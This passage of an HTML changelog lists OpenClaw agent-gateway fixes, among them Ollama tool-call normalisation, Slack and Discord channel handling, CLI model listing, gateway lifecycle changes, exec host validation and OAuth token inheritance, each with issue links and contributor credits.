<li>Control UI/i18n: route zh-CN agent, debug, channel-refresh, and exec-approval copy through the locale source while preserving the English <code>Cron Jobs</code> agent tab label and the security-audit command styling. Carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4040969776" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/39692" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/39692/hovercard" href="https://github.com/openclaw/openclaw/pull/39692">#39692</a> repair context. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hepeng154833488/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hepeng154833488">@hepeng154833488</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Auto-reply: honor explicit <code>silentReply.direct: "allow"</code> for clean empty or reasoning-only direct chat turns while keeping the default direct-chat empty-response guard conservative. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4351432589" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74409" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74409/hovercard" href="https://github.com/openclaw/openclaw/issues/74409">#74409</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jesuskannolis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jesuskannolis">@jesuskannolis</a>.</li>
<li>OpenAI Codex: send a non-empty Responses input item when a Codex turn only has systemPrompt-backed instructions, avoiding ChatGPT backend 400s from <code>input: []</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4346425036" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73820" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73820/hovercard" href="https://github.com/openclaw/openclaw/issues/73820">#73820</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/woodhouse-bot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/woodhouse-bot">@woodhouse-bot</a>.</li>
<li>Ollama: normalize provider-prefixed tool-call names at the native stream boundary so Kimi/Ollama calls such as <code>functions.exec</code> dispatch as <code>exec</code> instead of missing configured tools. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4352343792" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74487" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74487/hovercard" href="https://github.com/openclaw/openclaw/issues/74487">#74487</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/afurm/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/afurm">@afurm</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/carreipeia/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/carreipeia">@carreipeia</a>.</li>
<li>Security/audit: resolve configured model aliases before model-tier and small-parameter checks, so alias-based GPT-5/Codex configs no longer report false weak-model warnings. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4351877071" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74455" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74455/hovercard" href="https://github.com/openclaw/openclaw/issues/74455">#74455</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/blaspat/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/blaspat">@blaspat</a>.</li>
<li>CLI/agent: isolate Gateway-timeout embedded fallback runs under explicit <code>gateway-fallback-*</code> sessions so accepted Gateway runs cannot race transcript locks or replace the routed conversation session. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4222569416" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62981" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62981/hovercard" href="https://github.com/openclaw/openclaw/issues/62981">#62981</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/HemantSudarshan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/HemantSudarshan">@HemantSudarshan</a>.</li>
<li>CLI/QR/device-pair: reject malformed public setup URLs before issuing mobile pairing bootstrap tokens, while keeping valid bare host:port setup URLs supported. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Lucenx9/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Lucenx9">@Lucenx9</a>.</li>
<li>Models/UI: hide unauthenticated providers from the default Web chat, <code>/models</code>, and model setup pickers while keeping explicit full-catalog browse paths through <code>view: "all"</code>, <code>/models &lt;provider&gt; all</code>, and <code>models list --all</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4351540119" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74423" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74423/hovercard" href="https://github.com/openclaw/openclaw/issues/74423">#74423</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/guarismo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/guarismo">@guarismo</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SymbolStar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SymbolStar">@SymbolStar</a>.</li>
<li>Ollama: keep explicit local model runs on target-provider runtime hooks when PI discovery is skipped, so one-shot Ollama calls no longer cold-load unrelated provider runtimes before streaming. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347954374" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74078" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74078/hovercard" href="https://github.com/openclaw/openclaw/issues/74078">#74078</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sakalaboator/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sakalaboator">@sakalaboator</a>.</li>
<li>Slack/prompts: rely on Slack <code>interactiveReplies</code> guidance instead of generic <code>inlineButtons</code> config hints so enabled Slack button directives are not contradicted. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4077041050" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/46647" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/46647/hovercard" href="https://github.com/openclaw/openclaw/issues/46647">#46647</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jeremykoerber/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jeremykoerber">@jeremykoerber</a>.</li>
<li>Slack/reactions: treat duplicate <code>already_reacted</code> responses as idempotent success so repeated agent reaction adds no longer surface as tool failures. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4291287868" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69005" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69005/hovercard" href="https://github.com/openclaw/openclaw/issues/69005">#69005</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shipitsteven/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shipitsteven">@shipitsteven</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/martingarramon/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/martingarramon">@martingarramon</a>.</li>
<li>Channels/Discord: cool down Cloudflare/Error 1015 HTML 429 REST failures during startup application lookup and gateway metadata fetches, add <code>channels.discord.applicationId</code> as an app-id lookup bypass, sanitize HTML bodies before logging, and honor Retry-After before falling back to a conservative cooldown. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4038404026" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/38853" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/38853/hovercard" href="https://github.com/openclaw/openclaw/issues/38853">#38853</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4352352572" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74489" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74489/hovercard" href="https://github.com/openclaw/openclaw/pull/74489">#74489</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/djgeorg3/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/djgeorg3">@djgeorg3</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Garyko0730/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Garyko0730">@Garyko0730</a>.</li>
<li>Slack/tools: expose <code>fileId</code> in the shared message tool schema so <code>download-file</code> can receive Slack attachment IDs from inbound placeholders. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4074134594" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/45574" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/45574/hovercard" href="https://github.com/openclaw/openclaw/issues/45574">#45574</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/chadvegas/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/chadvegas">@chadvegas</a>.</li>
<li>Exec: reject invalid per-call <code>host</code> values instead of silently falling back to the default target, so hostname-like values fail before commands run. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4351549756" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74426" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74426/hovercard" href="https://github.com/openclaw/openclaw/issues/74426">#74426</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/scr00ge-00/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/scr00ge-00">@scr00ge-00</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vyctorbrzezowski/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vyctorbrzezowski">@vyctorbrzezowski</a>.</li>
<li>Google/Gemini: send non-empty placeholder content when a Gemini run is triggered with empty or filtered user content, avoiding <code>contents is not specified</code> API errors. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/CaoYuhaoCarl/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/CaoYuhaoCarl">@CaoYuhaoCarl</a>.</li>
<li>Heartbeat: preserve non-task <code>HEARTBEAT.md</code> context around <code>tasks:</code> blocks and apply <code>agents.defaults.heartbeat</code> to all agents unless per-agent heartbeat entries restrict scope. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Sekhar03/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Sekhar03">@Sekhar03</a>.</li>
<li>Markdown: preserve paragraph breaks inside loose list items in shared outbound formatting while keeping tight list spacing stable. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Lucenx9/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Lucenx9">@Lucenx9</a>.</li>
<li>Build/Gateway: route restart, shutdown, respawn, diagnostics, command-queue cleanup, and runtime cleanup through one stable gateway lifecycle runtime entry so rebuilt packages do not strand long-running gateways on stale hashed chunks. Carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347423967" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73964" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73964/hovercard" href="https://github.com/openclaw/openclaw/pull/73964">#73964</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</li>
<li>Memory/wiki: keep broad shared-source and generated related-link blocks from turning every page into a search hit, cap noisy backlinks, support all-term searches such as people-routing queries, and prefer readable page body snippets over generated metadata. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Cron/Gateway: abort and bounded-clean up timed-out isolated agent turns before recording the timeout, so stale cron sessions cannot leave Discord or other chat lanes stuck in <code>processing</code> after a timeout. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Agents/errors: suppress malformed streaming tool-call JSON fragments before they reach chat surfaces while preserving provider request-validation diagnostics. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4187420949" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59076" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59076/hovercard" href="https://github.com/openclaw/openclaw/issues/59076">#59076</a>; keeps <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4187447924" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59080" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59080/hovercard" href="https://github.com/openclaw/openclaw/issues/59080">#59080</a> as duplicate coverage. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4187915161" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59118" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/59118/hovercard" href="https://github.com/openclaw/openclaw/pull/59118">#59118</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/singleGanghood/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/singleGanghood">@singleGanghood</a>.</li>
<li>CLI/models: restore provider-filtered <code>models list --all --provider &lt;id&gt;</code> rows for providers without manifest/static catalog coverage, including Anthropic and Amazon Bedrock, while keeping the compatibility fallback off expensive availability and resolver paths. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>CLI/models: keep manifest auth-evidence credentials visible across <code>models status</code>, auth probes, and PI model discovery so workspace-scoped provider auth does not disagree between listing, probing, and execution. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>CLI/models: move local credential evidence such as Google Vertex ADC into generic plugin manifest setup metadata so the model-list auth index stays declarative without provider-specific runtime branches. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>CLI/models: compute the <code>models list</code> Auth column through one command-local provider auth index so row rendering no longer repeats auth profile, env, configured-provider, AWS, or synthetic-auth checks per model row. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>CLI/models: move the OpenAI listable catalog into the plugin manifest so <code>models list --all --provider openai</code> uses the manifest fast path instead of loading provider runtime normalization hooks. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>CLI/tools: keep the Gateway <code>tools.*</code> RPC namespace out of plugin command discovery and managed proxy startup, so stray commands like <code>openclaw tools effective</code> fail quickly instead of cold-loading plugin metadata. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342227669" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73477" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73477/hovercard" href="https://github.com/openclaw/openclaw/issues/73477">#73477</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/oromeis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/oromeis">@oromeis</a>.</li>
<li>CLI/status: keep default text <code>openclaw status --usage</code> on metadata-only channel scans unless <code>--deep</code> or <code>--all</code> is set, and send stray <code>openclaw tools --help</code> through the precomputed root-help fast path so latency-triage commands avoid plugin/runtime cold loads before printing. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342227669" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73477" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73477/hovercard" href="https://github.com/openclaw/openclaw/issues/73477">#73477</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4349031630" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74220" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74220/hovercard" href="https://github.com/openclaw/openclaw/pull/74220">#74220</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/oromeis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/oromeis">@oromeis</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/NianJiuZst/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/NianJiuZst">@NianJiuZst</a>.</li>
<li>Agents/diagnostics: trace embedded-run startup and preparation stage timings before model I/O, and warn only on severe slow stages, so Docker/VPS latency reports can identify whether plugin loading, auth/model resolution, tool inventory, bootstrap, MCP/LSP, resource loading, or stream setup is dominating pre-run latency without noisy normal logs. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4341750455" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73428" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73428/hovercard" href="https://github.com/openclaw/openclaw/issues/73428">#73428</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Dimaoggg/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Dimaoggg">@Dimaoggg</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/quangtran88/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/quangtran88">@quangtran88</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Heyvhuang/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Heyvhuang">@Heyvhuang</a>.</li>
<li>Agents/subagents: cache persisted subagent run registry reads by file signature while preserving fresh-parse isolation, so busy gateways stop reparsing unchanged <code>subagents/runs.json</code> on controller/list/status hot paths. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4331750102" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72338" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72338/hovercard" href="https://github.com/openclaw/openclaw/issues/72338">#72338</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/argus-as/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/argus-as">@argus-as</a>.</li>
<li>Gateway/clients: wait for the event loop to become responsive before opening Gateway WebSocket RPC/probe/client connections while charging that readiness wait to caller timeouts, so Windows deferred module-evaluation stalls no longer turn healthy loopback gateways into false handshake timeouts across status, TUI, ACP, MCP, node-host, and plugin client paths. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4349780099" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74279" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74279/hovercard" href="https://github.com/openclaw/openclaw/issues/74279">#74279</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4082797740" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/48270" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/48270/hovercard" href="https://github.com/openclaw/openclaw/pull/48270">#48270</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wongcode/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wongcode">@wongcode</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joost-heijden/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joost-heijden">@joost-heijden</a>.</li>
<li>Gateway/Windows: read listener command lines via PowerShell before falling back to <code>wmic</code>, so restart health can recognize OpenClaw listeners on modern Windows installs and avoid long anonymous-port waits. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4349819170" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74280" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74280/hovercard" href="https://github.com/openclaw/openclaw/issues/74280">#74280</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zym951223/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zym951223">@zym951223</a>.</li>
<li>Plugins/runtime-deps: record process start-time in bundled dependency install locks and expire recycled-PID locks, so Docker gateway restarts recover from stale <code>.openclaw-runtime-deps.lock</code> directories without waiting through repeated five-minute timeouts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4350782800" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74346" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74346/hovercard" href="https://github.com/openclaw/openclaw/issues/74346">#74346</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4350992165" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74361" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74361/hovercard" href="https://github.com/openclaw/openclaw/pull/74361">#74361</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jhsmith409/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jhsmith409">@jhsmith409</a>.</li>
<li>Plugins/runtime-deps: memoize packaged bundled runtime dist-mirror preparation after the first successful pass while keeping source-checkout mirrors refreshable, so constrained Docker/VPS installs avoid repeated root scans before chat turns. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4341750455" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73428" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73428/hovercard" href="https://github.com/openclaw/openclaw/issues/73428">#73428</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4341661895" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73421" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73421/hovercard" href="https://github.com/openclaw/openclaw/issues/73421">#73421</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342776048" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73532" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73532/hovercard" href="https://github.com/openclaw/openclaw/issues/73532">#73532</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342227669" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73477" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73477/hovercard" href="https://github.com/openclaw/openclaw/issues/73477">#73477</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Dimaoggg/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Dimaoggg">@Dimaoggg</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/oromeis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/oromeis">@oromeis</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/oadiazp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/oadiazp">@oadiazp</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jmfraga/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jmfraga">@jmfraga</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bstanbury/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bstanbury">@bstanbury</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/antoniusfelix/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/antoniusfelix">@antoniusfelix</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jkobject/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jkobject">@jkobject</a>.</li>
<li>Channels/Discord: treat bare numeric outbound targets that match the effective Discord DM allowlist as user DMs while preserving account-specific legacy <code>dm.allowFrom</code> precedence over inherited root <code>allowFrom</code>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4350101821" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74303" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74303/hovercard" href="https://github.com/openclaw/openclaw/pull/74303">#74303</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Squirbie/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Squirbie">@Squirbie</a>.</li>
<li>Channels/Discord/Slack: share one DM policy/allowlist resolver across runtime, setup, allowlist editing, and doctor repair, so legacy <code>dm.policy</code> / <code>dm.allowFrom</code> compatibility migrates to canonical <code>dmPolicy</code> / <code>allowFrom</code> without divergent access checks. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Squirbie/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Squirbie">@Squirbie</a>.</li>
<li>Control UI: make the chat sidebar split divider focusable, keyboard-resizable, ARIA-described, and pointer-event based so sidebar resizing works without a mouse. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BunsDev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BunsDev">@BunsDev</a>.</li>
<li>Agents/usage: keep PI embedded-run telemetry attributed to the resolved model provider instead of the PI harness label, so OpenRouter and other provider-backed turns report the right provider in session usage and traces. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Agents/attribution: send OpenClaw attribution headers on native OpenAI and Codex traffic, including SDK transports, realtime voice and TTS, device-code auth, WHAM usage, and remote embeddings, so PI-origin defaults no longer leak into provider requests. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Agents/auth: keep OAuth auth profiles inherited from the main agent read-through instead of copying refresh tokens into secondary agents, and refresh Codex app-server tokens against the owning store so multi-agent swarms avoid reused refresh-token failures. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347764512" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74055" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74055/hovercard" href="https://github.com/openclaw/openclaw/issues/74055">#74055</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ClarityInvest/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ClarityInvest">@ClarityInvest</a>.</li>
